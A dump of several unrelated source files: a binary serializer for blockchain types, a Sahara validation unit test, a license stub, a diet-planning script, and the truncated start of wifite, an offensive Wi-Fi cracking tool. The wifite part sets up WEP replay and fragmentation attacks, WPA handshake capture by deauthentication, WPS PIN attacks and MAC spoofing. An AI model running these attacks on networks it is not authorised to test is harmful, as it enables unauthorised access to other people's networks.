timeformat = '%Y-%m-%dT%H:%M:%S%Z'
def varint(n):
""" Varint encoding
"""
data = b''
while n >= 0x80:
data += bytes([(n & 0x7f) | 0x80])
n >>= 7
data += bytes([n])
return data
def varintdecode(data):
""" Varint decoding
"""
shift = 0
result = 0
for c in data:
b = ord(c)
result |= ((b & 0x7f) << shift)
if not (b & 0x80):
break
shift += 7
return result
def variable_buffer(s):
""" Encode variable length buffer
"""
return varint(len(s)) + s
def JsonObj(data):
""" Returns json object from data
"""
return json.loads(str(data))
class Uint8():
def __init__(self, d):
self.data = d
def __bytes__(self):
return struct.pack("<B", self.data)
def __str__(self):
return '%d' % self.data
class Int16():
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return struct.pack("<h", int(self.data))
def __str__(self):
return '%d' % self.data
class Uint16():
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return struct.pack("<H", self.data)
def __str__(self):
return '%d' % self.data
class Uint32():
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return struct.pack("<I", self.data)
def __str__(self):
return '%d' % self.data
class Uint64():
def __init__(self, d):
self.data = int(d)
def __bytes__(self):
return struct.pack("<Q", self.data)
def __str__(self):
return '%d' % self.data
class Varint32():
def __init__(self, d):
self.data = d
def __bytes__(self):
return varint(self.data)
def __str__(self):
return '%d' % self.data
class Int64():
def __init__(self, d):
self.data = d
def __bytes__(self):
return struct.pack("<q", self.data)
def __str__(self):
return '%d' % self.data
class String():
def __init__(self, d):
self.data = d
def __bytes__(self):
d = self.unicodify()
return varint(len(d)) + d
def __str__(self):
return '%s' % str(self.data)
def unicodify(self):
r = []
for s in self.data:
o = ord(s)
if o <= 7:
r.append("u%04x" % o)
elif o == 8:
r.append("b")
elif o == 9:
r.append("\t")
elif o == 10:
r.append("\n")
elif o == 11:
r.append("u%04x" % o)
elif o == 12:
r.append("f")
elif o == 13:
r.append("\r")
elif o > 13 and o < 32:
r.append("u%04x" % o)
else:
r.append(s)
return bytes("".join(r), "utf-8")
class Bytes():
def __init__(self, d, length=None):
self.data = d
if length:
self.length = length
else:
self.length = len(self.data)
def __bytes__(self):
# FIXME constraint data to self.length
d = unhexlify(bytes(self.data, 'utf-8'))
return varint(len(d)) + d
def __str__(self):
return str(self.data)
class Void():
def __init__(self):
pass
def __bytes__(self):
return b''
def __str__(self):
return ""
class Array():
def __init__(self, d):
self.data = d
self.length = Varint32(len(self.data))
def __bytes__(self):
return bytes(self.length) + b"".join([bytes(a) for a in self.data])
def __str__(self):
r = []
for a in self.data:
if isinstance(a, ObjectId):
r.append(str(a))
elif isinstance(a, VoteId):
r.append(str(a))
elif isinstance(a, String):
r.append(str(a))
else:
r.append(JsonObj(a))
return json.dumps(r)
class PointInTime():
def __init__(self, d):
self.data = d
def __bytes__(self):
return struct.pack("<I", timegm(time.strptime((self.data + "UTC"), timeformat)))
def __str__(self):
return self.data
class Signature():
def __init__(self, d):
self.data = d
def __bytes__(self):
return self.data
def __str__(self):
return json.dumps(hexlify(self.data).decode('ascii'))
class Bool(Uint8): # Bool = Uint8
def __init__(self, d):
super().__init__(d)
def __str__(self):
return True if self.data else False
class Set(Array): # Set = Array
def __init__(self, d):
super().__init__(d)
class Fixed_array():
def __init__(self, d):
raise NotImplementedError
def __bytes__(self):
raise NotImplementedError
def __str__(self):
raise NotImplementedError
class Optional():
def __init__(self, d):
self.data = d
def __bytes__(self):
if not self.data:
return bytes(Bool(0))
else:
return bytes(Bool(1)) + bytes(self.data) if bytes(self.data) else bytes(Bool(0))
def __str__(self):
return str(self.data)
def isempty(self):
if not self.data:
return True
return not bool(bytes(self.data))
class Static_variant():
def __init__(self, d, type_id):
self.data = d
self.type_id = type_id
def __bytes__(self):
return varint(self.type_id) + bytes(self.data)
def __str__(self):
return {self._type_id: str(self.data)}
class Map():
def __init__(self, data):
self.data = data
def __bytes__(self):
b = b""
b += varint(len(self.data))
for e in self.data:
b += bytes(e[0]) + bytes(e[1])
return b
def __str__(self):
r = []
for e in self.data:
r.append([str(e[0]), str(e[1])])
return json.dumps(r)
class Id():
def __init__(self, d):
self.data = Varint32(d)
def __bytes__(self):
return bytes(self.data)
def __str__(self):
return str(self.data)
class VoteId():
def __init__(self, vote):
parts = vote.split(":")
assert len(parts) == 2
self.type = int(parts[0])
self.instance = int(parts[1])
def __bytes__(self):
binary = (self.type & 0xff) | (self.instance << 8)
return struct.pack("<I", binary)
def __str__(self):
return "%d:%d" % (self.type, self.instance)
class ObjectId():
""" Encodes object/protocol ids
"""
def __init__(self, object_str, type_verify=None):
if len(object_str.split(".")) == 3:
space, type, id = object_str.split(".")
self.space = int(space)
self.type = int(type)
self.instance = Id(int(id))
self.Id = object_str
if type_verify:
assert object_type[type_verify] == int(type),\
"Object id does not match object type! " +\
"Excpected %d, got %d" %\
(object_type[type_verify], int(type))
else:
raise Exception("Object id is invalid")
def __bytes__(self):
return bytes(self.instance) # only yield instance
def __str__(self):
return self.Id
|
matips/iosr-2015 | refs/heads/master | sahara/tests/unit/service/validation/test_ng_template_validation_update.py | 7 | # Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
from sahara.service import api
from sahara.service.validations import node_group_template_schema as nt
from sahara.tests.unit.service.validation import utils as u
def empty(data, **kwargs):
pass
SAMPLE_DATA = {
'name': 'a',
'flavor_id': '42',
'plugin_name': 'vanilla',
'hadoop_version': '1.2.1',
'node_processes': ['namenode',
'datanode',
'secondarynamenode',
'tasktracker',
'jobtracker'],
'node_configs': {
'HDFS': {
u'hadoop.tmp.dir': '/temp/'
}
},
'image_id': '550e8400-e29b-41d4-a716-446655440000',
'volumes_per_node': 2,
'volumes_size': 10,
'description': 'test node template',
'floating_ip_pool': 'd9a3bebc-f788-4b81-9a93-aa048022c1ca'
}
class TestNGTemplateUpdateValidation(u.ValidationTestCase):
def setUp(self):
super(TestNGTemplateUpdateValidation, self).setUp()
self._create_object_fun = empty
self.scheme = nt.NODE_GROUP_TEMPLATE_UPDATE_SCHEMA
api.plugin_base.setup_plugins()
def test_node_groups_update_nothing_required(self):
self._assert_create_object_validation(
data={}
)
def test_ng_template_update_schema(self):
create = copy.copy(nt.NODE_GROUP_TEMPLATE_SCHEMA)
update = copy.copy(nt.NODE_GROUP_TEMPLATE_UPDATE_SCHEMA)
# No required items for update
self.assertEqual([], update["required"])
# Other than required, schemas are equal
del update["required"]
del create["required"]
self.assertEqual(create, update)
def test_ng_template_update_v(self):
self._assert_create_object_validation(
data=SAMPLE_DATA
)
extra = copy.copy(SAMPLE_DATA)
extra['dog'] = 'fido'
self._assert_create_object_validation(
data=extra,
bad_req_i=(1, "VALIDATION_ERROR",
"Additional properties are not allowed "
"('dog' was unexpected)")
)
|
Fiware/cloud.PaaS | refs/heads/master | test/acceptance/integration/environments/get_environment_details/__init__.py | 86 | # -*- coding: utf-8 -*-
# Copyright 2014 Telefonica Investigación y Desarrollo, S.A.U
#
# This file is part of FI-WARE project.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
#
# You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For those usages not covered by the Apache version 2.0 License please
# contact with opensource@tid.es
|
mpalop/nekane | refs/heads/master | foo.py | 1 | __author__ = 'manel'
from DietaNekane import Plato, Sentada, Periodo
p1 = Plato.Plato(u'primer plato', hc=10, calorias=20)
p2 = Plato.Plato(u'segundo plato', hc=11, calorias=21)
p3 = Plato.Plato(u'tercer plato', hc=13, calorias=23)
d = Sentada.Desayuno(p1)
m = Sentada.Merienda(p2)
c = Sentada.Comida(primero=p1, segundo=p2, postre=p3)
c2 = Sentada.Cena(primero=p1, segundo=p2, postre=p3)
dias = {
"LUNES": Periodo.Dia("LUNES", d, c, m, c2),
"MARTES": Periodo.Dia("MARTES", d, c, m, c2),
"MIERCOLES": Periodo.Dia("MIERCOLES", d, c, m, c2),
"JUEVES": Periodo.Dia("JUEVES", d, c, m, c2),
"VIERNES": Periodo.Dia("VIERNES", d, c, m, c2),
"SABADO": Periodo.Dia("SABADO", d, c, m, c2),
"DOMINGO": Periodo.Dia("DOMINGO", d, c, m, c2)
}
print dias
semana = Periodo.Semana(dias)
print semana.detalle()
print semana.lista_platos()
|
rafinkarki/wifite | refs/heads/master | wifite.py | 56 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
wifite
author: derv82 at gmail
Licensed under the GNU General Public License Version 2 (GNU GPL v2),
available at: http://www.gnu.org/licenses/gpl-2.0.txt
(C) 2011 Derv Merkler
-----------------
TODO:
ignore root check when -cracked (afterward) (need root for -check?)
"cracked*" in list of AP's
Restore same command-line switch names from v1
If device already in monitor mode, check for and, if applicable, use macchanger
WPS
* Mention reaver automatically resumes sessions
* Warning about length of time required for WPS attack (*hours*)
* Show time since last successful attempt
* Percentage of tries/attempts ?
* Update code to work with reaver 1.4 ("x" sec/att)
WEP:
* ability to pause/skip/continue (done, not tested)
* Option to capture only IVS packets (uses --output-format ivs,csv)
- not compatible on older aircrack-ng's.
- Just run "airodump-ng --output-format ivs,csv", "No interface specified" = works
- would cut down on size of saved .caps
reaver:
MONITOR ACTIVITY!
- Enter ESSID when executing (?)
- Ensure WPS key attempts have begun.
- If no attempts can be made, stop attack
- During attack, if no attempts are made within X minutes, stop attack & Print
- Reaver's output when unable to associate:
[!] WARNING: Failed to associate with AA:BB:CC:DD:EE:FF (ESSID: ABCDEF)
- If failed to associate for x minutes, stop attack (same as no attempts?)
MIGHTDO:
* WPA - crack (pyrit/cowpatty) (not really important)
* Test injection at startup? (skippable via command-line switch)
"""
#############
# LIBRARIES #
#############
import os # File management
import time # Measuring attack intervals
import random # Generating a random MAC address.
import errno # Error numbers
from sys import argv # Command-line arguments
from sys import stdout, stdin # Flushing
from shutil import copy # Copying .cap files
# Executing, communicating with, killing processes
from subprocess import Popen, call, PIPE
from signal import SIGINT, SIGTERM
import re # RegEx, Converting SSID to filename
import urllib # Check for new versions from the repo
################################
# GLOBAL VARIABLES IN ALL CAPS #
################################
REVISION = 85;
# WPA variables
WPA_DISABLE = False # Flag to skip WPA handshake capture
WPA_STRIP_HANDSHAKE = True # Use pyrit or tshark (if applicable) to strip handshake
WPA_DEAUTH_TIMEOUT = 10 # Time to wait between deauthentication bursts (in seconds)
WPA_ATTACK_TIMEOUT = 500 # Total time to allow for a handshake attack (in seconds)
WPA_HANDSHAKE_DIR = 'hs' # Directory in which handshakes .cap files are stored
# Strip file path separator if needed
if WPA_HANDSHAKE_DIR != '' and WPA_HANDSHAKE_DIR[-1] == os.sep:
WPA_HANDSHAKE_DIR = WPA_HANDSHAKE_DIR[:-1]
WPA_FINDINGS = [] # List of strings containing info on successful WPA attacks
WPA_DONT_CRACK = False # Flag to skip cracking of handshakes
WPA_DICTIONARY = '/pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'
if not os.path.exists(WPA_DICTIONARY): WPA_DICTIONARY = ''
# Various programs to use when checking for a four-way handshake.
# True means the program must find a valid handshake in order for wifite to recognize a handshake.
# Not finding handshake short circuits result (ALL 'True' programs must find handshake)
WPA_HANDSHAKE_TSHARK = True # Checks for sequential 1,2,3 EAPOL msg packets (ignores 4th)
WPA_HANDSHAKE_PYRIT = False # Sometimes crashes on incomplete dumps, but accurate.
WPA_HANDSHAKE_AIRCRACK = True # Not 100% accurate, but fast.
WPA_HANDSHAKE_COWPATTY = False # Uses more lenient "nonstrict mode" (-2)
# WEP variables
WEP_DISABLE = False # Flag for ignoring WEP networks
WEP_PPS = 600 # packets per second (Tx rate)
WEP_TIMEOUT = 600 # Amount of time to give each attack
WEP_ARP_REPLAY = True # Various WEP-based attacks via aireplay-ng
WEP_CHOPCHOP = True #
WEP_FRAGMENT = True #
WEP_CAFFELATTE = True #
WEP_P0841 = True
WEP_HIRTE = True
WEP_CRACK_AT_IVS = 10000 # Number of IVS at which we start cracking
WEP_IGNORE_FAKEAUTH = True # When True, continues attack despite fake authentication failure
WEP_FINDINGS = [] # List of strings containing info on successful WEP attacks.
WEP_SAVE = False # Save packets.
# WPS variables
WPS_DISABLE = False # Flag to skip WPS scan and attacks
WPS_FINDINGS = [] # List of (successful) results of WPS attacks
WPS_TIMEOUT = 660 # Time to wait (in seconds) for successful PIN attempt
WPS_RATIO_THRESHOLD = 0.01 # Lowest percentage of tries/attempts allowed (where tries > 0)
WPS_MAX_RETRIES = 0 # Number of times to re-try the same pin before giving up completely.
# Program variables
WIRELESS_IFACE = '' # User-defined interface
TARGET_CHANNEL = 0 # User-defined channel to scan on
TARGET_ESSID = '' # User-defined ESSID of specific target to attack
TARGET_BSSID = '' # User-defined BSSID of specific target to attack
IFACE_TO_TAKE_DOWN = '' # Interface that wifite puts into monitor mode
# It's our job to put it out of monitor mode after the attacks
ORIGINAL_IFACE_MAC = ('', '') # Original interface name[0] and MAC address[1] (before spoofing)
DO_NOT_CHANGE_MAC = True # Flag for disabling MAC anonymizer
TARGETS_REMAINING = 0 # Number of access points remaining to attack
WPA_CAPS_TO_CRACK = [] # list of .cap files to crack (full of CapFile objects)
THIS_MAC = '' # The interfaces current MAC address.
SHOW_MAC_IN_SCAN = False # Display MACs of the SSIDs in the list of targets
CRACKED_TARGETS = [] # List of targets we have already cracked
ATTACK_ALL_TARGETS = False # Flag for when we want to attack *everyone*
ATTACK_MIN_POWER = 0 # Minimum power (dB) for access point to be considered a target
VERBOSE_APS = True # Print access points as they appear
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
if os.getuid() != 0:
print R+' [!]'+O+' ERROR:'+G+' wifite'+O+' must be run as '+R+'root'+W
print R+' [!]'+O+' login as root ('+W+'su root'+O+') or try '+W+'sudo ./wifite.py'+W
exit(1)
if not os.uname()[0].startswith("Linux") and not 'Darwin' in os.uname()[0]: # OSX support, 'cause why not?
print O+' [!]'+R+' WARNING:'+G+' wifite'+W+' must be run on '+O+'linux'+W
exit(1)
# Create temporary directory to work in
from tempfile import mkdtemp
temp = mkdtemp(prefix='wifite')
if not temp.endswith(os.sep):
temp += os.sep
# /dev/null, send output from programs so they don't print to screen.
DN = open(os.devnull, 'w')
###################
# DATA STRUCTURES #
###################
class CapFile:
"""
Holds data about an access point's .cap file, including AP's ESSID & BSSID.
"""
def __init__(self, filename, ssid, bssid):
self.filename = filename
self.ssid = ssid
self.bssid = bssid
class Target:
"""
Holds data for a Target (aka Access Point aka Router)
"""
def __init__(self, bssid, power, data, channel, encryption, ssid):
self.bssid = bssid
self.power = power
self.data = data
self.channel = channel
self.encryption = encryption
self.ssid = ssid
self.wps = False # Default to non-WPS-enabled router.
self.key = ''
class Client:
"""
Holds data for a Client (device connected to Access Point/Router)
"""
def __init__(self, bssid, station, power):
self.bssid = bssid
self.station = station
self.power = power
##################
# MAIN FUNCTIONS #
##################
def main():
"""
Where the magic happens.
"""
global TARGETS_REMAINING, THIS_MAC, CRACKED_TARGETS
CRACKED_TARGETS = load_cracked() # Load previously-cracked APs from file
handle_args() # Parse args from command line, set global variables.
initial_check() # Ensure required programs are installed.
# The "get_iface" method anonymizes the MAC address (if needed)
# and puts the interface into monitor mode.
iface = get_iface()
THIS_MAC = get_mac_address(iface) # Store current MAC address
(targets, clients) = scan(iface=iface, channel=TARGET_CHANNEL)
try:
index = 0
while index < len(targets):
target = targets[index]
# Check if we have already cracked this target
for already in CRACKED_TARGETS:
if already.bssid == targets[index].bssid:
print R+'\n [!]'+O+' you have already cracked this access point\'s key!'+W
print R+' [!] %s' % (C+already.ssid+W+': "'+G+already.key+W+'"')
ri = raw_input(GR+' [+] '+W+'do you want to crack this access point again? ('+G+'y/'+O+'n'+W+'): ')
if ri.lower() == 'n':
targets.pop(index)
index -= 1
break
# Check if handshakes already exist, ask user whether to skip targets or save new handshakes
handshake_file = WPA_HANDSHAKE_DIR + os.sep + re.sub(r'[^a-zA-Z0-9]', '', target.ssid) \
+ '_' + target.bssid.replace(':', '-') + '.cap'
if os.path.exists(handshake_file):
print R+'\n [!] '+O+'you already have a handshake file for %s:' % (C+target.ssid+W)
print ' %s\n' % (G+handshake_file+W)
print GR+' [+]'+W+' do you want to '+G+'[s]kip'+W+', '+O+'[c]apture again'+W+', or '+R+'[o]verwrite'+W+'?'
ri = 'x'
while ri != 's' and ri != 'c' and ri != 'o':
ri = raw_input(GR+' [+] '+W+'enter '+G+'s'+W+', '+O+'c,'+W+' or '+R+'o'+W+': '+G).lower()
print W+"\b",
if ri == 's':
targets.pop(index)
index -= 1
elif ri == 'o':
remove_file(handshake_file)
continue
index += 1
except KeyboardInterrupt:
print '\n '+R+'(^C)'+O+' interrupted\n'
exit_gracefully(0)
wpa_success = 0
wep_success = 0
wpa_total = 0
wep_total = 0
TARGETS_REMAINING = len(targets)
for t in targets:
TARGETS_REMAINING -= 1
# Build list of clients connected to target
ts_clients = []
for c in clients:
if c.station == t.bssid:
ts_clients.append(c)
print ''
if t.encryption.find('WPA') != -1:
need_handshake = True
if not WPS_DISABLE and t.wps:
need_handshake = not wps_attack(iface, t)
wpa_total += 1
if not need_handshake: wpa_success += 1
if TARGETS_REMAINING < 0: break
if not WPA_DISABLE and need_handshake:
wpa_total += 1
if wpa_get_handshake(iface, t, ts_clients):
wpa_success += 1
elif t.encryption.find('WEP') != -1:
wep_total += 1
if attack_wep(iface, t, ts_clients):
wep_success += 1
else: print R+' unknown encryption:',t.encryption,W
# If user wants to stop attacking
if TARGETS_REMAINING <= 0: break
if wpa_total + wep_total > 0:
# Attacks are done! Show results to user
print ''
print GR+' [+] %s%d attack%s completed:%s' % (G, wpa_total + wep_total, '' if wpa_total+wep_total == 1 else 's', W)
print ''
if wpa_total > 0:
if wpa_success == 0: print GR+' [+]'+R,
elif wpa_success == wpa_total: print GR+' [+]'+G,
else: print GR+' [+]'+O,
print '%d/%d%s WPA attacks succeeded' % (wpa_success, wpa_total, W)
for finding in WPA_FINDINGS:
print ' ' + C+finding+W
if wep_total > 0:
if wep_success == 0: print GR+' [+]'+R,
elif wep_success == wep_total: print GR+' [+]'+G,
else: print GR+' [+]'+O,
print '%d/%d%s WEP attacks succeeded' % (wep_success, wep_total, W)
for finding in WEP_FINDINGS:
print ' ' + C+finding+W
caps = len(WPA_CAPS_TO_CRACK)
if caps > 0 and not WPA_DONT_CRACK:
print GR+' [+]'+W+' starting '+G+'WPA cracker'+W+' on %s%d handshake%s' % (G, caps, W if caps == 1 else 's'+W)
for cap in WPA_CAPS_TO_CRACK:
wpa_crack(cap)
print ''
exit_gracefully(0)
def rename(old, new):
"""
Renames file 'old' to 'new', works with separate partitions.
Thanks to hannan.sadar
"""
try:
os.rename(old, new)
except os.error, detail:
if detail.errno == errno.EXDEV:
try:
copy(old, new)
except:
os.unlink(new)
raise
os.unlink(old)
# if desired, deal with other errors
else:
raise
def initial_check():
"""
Ensures required programs are installed.
"""
global WPS_DISABLE
airs = ['aircrack-ng', 'airodump-ng', 'aireplay-ng', 'airmon-ng', 'packetforge-ng']
for air in airs:
if program_exists(air): continue
print R+' [!]'+O+' required program not found: %s' % (R+air+W)
print R+' [!]'+O+' this program is bundled with the aircrack-ng suite:'+W
print R+' [!]'+O+' '+C+'http://www.aircrack-ng.org/'+W
print R+' [!]'+O+' or: '+W+'sudo apt-get install aircrack-ng\n'+W
exit_gracefully(1)
if not program_exists('iw'):
print R+' [!]'+O+' airmon-ng requires the program %s\n' % (R+'iw'+W)
exit_gracefully(1)
printed = False
# Check reaver
if not program_exists('reaver'):
printed = True
print R+' [!]'+O+' the program '+R+'reaver'+O+' is required for WPS attacks'+W
print R+' '+O+' available at '+C+'http://code.google.com/p/reaver-wps'+W
WPS_DISABLE = True
elif not program_exists('walsh') and not program_exists('wash'):
printed = True
print R+' [!]'+O+' reaver\'s scanning tool '+R+'walsh'+O+' (or '+R+'wash'+O+') was not found'+W
print R+' [!]'+O+' please re-install reaver or install walsh/wash separately'+W
# Check handshake-checking apps
recs = ['tshark', 'pyrit', 'cowpatty']
for rec in recs:
if program_exists(rec): continue
printed = True
print R+' [!]'+O+' the program %s is not required, but is recommended%s' % (R+rec+O, W)
if printed: print ''
def handle_args():
"""
Handles command-line arguments, sets global variables.
"""
global WIRELESS_IFACE, TARGET_CHANNEL, DO_NOT_CHANGE_MAC, TARGET_ESSID, TARGET_BSSID
global WPA_DISABLE, WPA_STRIP_HANDSHAKE, WPA_DEAUTH_TIMEOUT, WPA_ATTACK_TIMEOUT
global WPA_DONT_CRACK, WPA_DICTIONARY, WPA_HANDSHAKE_TSHARK, WPA_HANDSHAKE_PYRIT
global WPA_HANDSHAKE_AIRCRACK, WPA_HANDSHAKE_COWPATTY
global WEP_DISABLE, WEP_PPS, WEP_TIMEOUT, WEP_ARP_REPLAY, WEP_CHOPCHOP, WEP_FRAGMENT
global WEP_CAFFELATTE, WEP_P0841, WEP_HIRTE, WEP_CRACK_AT_IVS, WEP_IGNORE_FAKEAUTH
global WEP_SAVE, SHOW_MAC_IN_SCAN, ATTACK_ALL_TARGETS, ATTACK_MIN_POWER
global WPS_DISABLE, WPS_TIMEOUT, WPS_RATIO_THRESHOLD, WPS_MAX_RETRIES
global VERBOSE_APS
args = argv[1:]
if args.count('-h') + args.count('--help') + args.count('?') + args.count('-help') > 0:
help()
exit_gracefully(0)
set_encrypt = False
set_hscheck = False
set_wep = False
capfile = '' # Filename of .cap file to analyze for handshakes
try:
for i in xrange(0, len(args)):
if not set_encrypt and (args[i] == '-wpa' or args[i] == '-wep' or args[i] == '-wps'):
WPS_DISABLE = True
WPA_DISABLE = True
WEP_DISABLE = True
set_encrypt = True
if args[i] == '-wpa':
print GR+' [+]'+W+' targeting '+G+'WPA'+W+' encrypted networks (use '+G+'-wps'+W+' for WPS scan)'
WPA_DISABLE = False
elif args[i] == '-wep':
print GR+' [+]'+W+' targeting '+G+'WEP'+W+' encrypted networks'
WEP_DISABLE = False
elif args[i] == '-wps':
print GR+' [+]'+W+' targeting '+G+'WPS-enabled'+W+' networks'
WPS_DISABLE = False
elif args[i] == '-c':
i += 1
try: TARGET_CHANNEL = int(args[i])
except ValueError: print O+' [!]'+R+' invalid channel: '+O+args[i]+W
except IndexError: print O+' [!]'+R+' no channel given!'+W
else: print GR+' [+]'+W+' channel set to %s' % (G+args[i]+W)
elif args[i] == '-mac':
print GR+' [+]'+W+' mac address anonymizing '+G+'enabled'+W
print O+' note: only works if device is not already in monitor mode!'+W
DO_NOT_CHANGE_MAC = False
elif args[i] == '-i':
i += 1
WIRELESS_IFACE = args[i]
print GR+' [+]'+W+' set interface: %s' % (G+args[i]+W)
elif args[i] == '-e':
i += 1
try: TARGET_ESSID = args[i]
except ValueError: print R+' [!]'+O+' no ESSID given!'+W
else: print GR+' [+]'+W+' targeting ESSID "%s"' % (G+args[i]+W)
elif args[i] == '-b':
i += 1
try: TARGET_BSSID = args[i]
except ValueError: print R+' [!]'+O+' no BSSID given!'+W
else: print GR+' [+]'+W+' targeting BSSID "%s"' % (G+args[i]+W)
elif args[i] == '-showb' or args[i] == '-showbssid':
SHOW_MAC_IN_SCAN = True
print GR+' [+]'+W+' target MAC address viewing '+G+'enabled'+W
elif args[i] == '-all' or args[i] == '-hax0ritna0':
print GR+' [+]'+W+' targeting '+G+'all access points'+W
ATTACK_ALL_TARGETS = True
elif args[i] == '-pow' or args[i] == '-power':
i += 1
try:
ATTACK_MIN_POWER = int(args[i])
except ValueError: print R+' [!]'+O+' invalid power level: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no power level given!'+W
else: print GR+' [+]'+W+' minimum target power set to %s' % (G+args[i] + "dB"+W)
elif args[i] == '-q' or args[i] == '-quiet':
VERBOSE_APS = False
print GR+' [+]'+W+' list of APs during scan '+O+'disabled'+W
elif args[i] == '-check':
i += 1
try: capfile = args[i]
except IndexError:
print R+' [!]'+O+' unable to analyze capture file'+W
print R+' [!]'+O+' no cap file given!\n'+W
exit_gracefully(1)
else:
if not os.path.exists(capfile):
print R+' [!]'+O+' unable to analyze capture file!'+W
print R+' [!]'+O+' file not found: '+R+capfile+'\n'+W
exit_gracefully(1)
elif args[i] == '-upgrade' or args[i] == '-update':
upgrade()
exit(0)
elif args[i] == '-cracked':
if len(CRACKED_TARGETS) == 0:
print R+' [!]'+O+' there are not cracked access points saved to '+R+'cracked.txt\n'+W
exit_gracefully(1)
print GR+' [+]'+W+' '+W+'previously cracked access points'+W+':'
for victim in CRACKED_TARGETS:
print ' %s (%s) : "%s"' % (C+victim.ssid+W, C+victim.bssid+W, G+victim.key+W)
print ''
exit_gracefully(0)
# WPA
if not set_hscheck and (args[i] == '-tshark' or args[i] == '-cowpatty' or args[i] == '-aircrack' or args[i] == 'pyrit'):
WPA_HANDSHAKE_TSHARK = False
WPA_HANDSHAKE_PYRIT = False
WPA_HANDSHAKE_COWPATTY = False
WPA_HANDSHAKE_AIRCRACK = False
set_hscheck = True
elif args[i] == '-strip':
WPA_STRIP_HANDSHAKE = True
print GR+' [+]'+W+' handshake stripping '+G+'enabled'+W
elif args[i] == '-wpadt':
i += 1
WPA_DEAUTH_TIMEOUT = int(args[i])
print GR+' [+]'+W+' WPA deauth timeout set to %s' % (G+args[i]+' seconds'+W)
elif args[i] == '-wpat':
i += 1
WPA_ATTACK_TIMEOUT = int(args[i])
print GR+' [+]'+W+' WPA attack timeout set to %s' % (G+args[i]+' seconds'+W)
elif args[i] == '-crack':
WPA_DONT_CRACK = False
print GR+' [+]'+W+' WPA cracking '+G+'enabled'+W
elif args[i] == '-dict':
i += 1
try:
WPA_DICTIONARY = args[i]
except IndexError: print R+' [!]'+O+' no WPA dictionary given!'
else:
if os.path.exists(args[i]):
print GR+' [+]'+W+' WPA dictionary set to %s' % (G+args[i]+W)
else:
print R+' [!]'+O+' WPA dictionary file not found: %s' % (args[i])
if args[i] == '-tshark':
WPA_HANDSHAKE_TSHARK = True
print GR+' [+]'+W+' tshark handshake verification '+G+'enabled'+W
if args[i] == '-pyrit':
WPA_HANDSHAKE_PYRIT = True
print GR+' [+]'+W+' pyrit handshake verification '+G+'enabled'+W
if args[i] == '-aircrack':
WPA_HANDSHAKE_AIRCRACK = True
print GR+' [+]'+W+' aircrack handshake verification '+G+'enabled'+W
if args[i] == '-cowpatty':
WPA_HANDSHAKE_COWPATTY = True
print GR+' [+]'+W+' cowpatty handshake verification '+G+'enabled'+W
# WEP
if not set_wep and args[i] == '-chopchop' or args[i] == 'fragment' or \
args[i] == 'caffelatte' or args[i] == '-arpreplay' or \
args[i] == '-p0841' or args[i] == '-hirte':
WEP_CHOPCHOP = False
WEP_ARPREPLAY = False
WEP_CAFFELATTE = False
WEP_FRAGMENT = False
WEP_P0841 = False
WEP_HIRTE = False
if args[i] == '-chopchop':
print GR+' [+]'+W+' WEP chop-chop attack '+G+'enabled'+W
WEP_CHOPCHOP = True
if args[i] == '-fragment' or args[i] == '-frag' or args[i] == '-fragmentation':
print GR+' [+]'+W+' WEP fragmentation attack '+G+'enabled'+W
WEP_FRAGMENT = True
if args[i] == '-caffelatte':
print GR+' [+]'+W+' WEP caffe-latte attack '+G+'enabled'+W
WEP_CAFFELATTE = True
if args[i] == '-arpreplay':
print GR+' [+]'+W+' WEP arp-replay attack '+G+'enabled'+W
WEP_ARPREPLAY = True
if args[i] == '-p0841':
print GR+' [+]'+W+' WEP p0841 attack '+G+'enabled'+W
WEP_P0841 = True
if args[i] == '-hirte':
print GR+' [+]'+W+' WEP hirte attack '+G+'enabled'+W
WEP_HIRTE = True
if args[i] == '-nofake':
print GR+' [+]'+W+' ignoring failed fake-authentication '+R+'disabled'+W
WEP_IGNORE_FAKEAUTH = False
if args[i] == '-wept' or args[i] == '-weptime':
i += 1
try:
WEP_TIMEOUT = int(args[i])
except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no timeout given!'+W
else: print GR+' [+]'+W+' WEP attack timeout set to %s' % (G+args[i] + " seconds"+W)
if args[i] == '-pps':
i += 1
try:
WEP_PPS = int(args[i])
except ValueError: print R+' [!]'+O+' invalid value: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no value given!'+W
else: print GR+' [+]'+W+' packets-per-second rate set to %s' % (G+args[i] + " packets/sec"+W)
if args[i] == '-save' or args[i] == '-wepsave':
WEP_SAVE = True
print GR+' [+]'+W+' WEP .cap file saving '+G+'enabled'+W
# WPS
if args[i] == '-wpst' or args[i] == '-wpstime':
i += 1
try:
WPS_TIMEOUT = int(args[i])
except ValueError: print R+' [!]'+O+' invalid timeout: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no timeout given!'+W
else: print GR+' [+]'+W+' WPS attack timeout set to %s' % (G+args[i] + " seconds"+W)
if args[i] == '-wpsratio' or args[i] == 'wpsr':
i += 1
try:
WPS_RATIO_THRESHOLD = float(args[i])
except ValueError: print R+' [!]'+O+' invalid percentage: %s' % (R+args[i]+W)
except IndexError: print R+' [!]'+O+' no ratio given!'+W
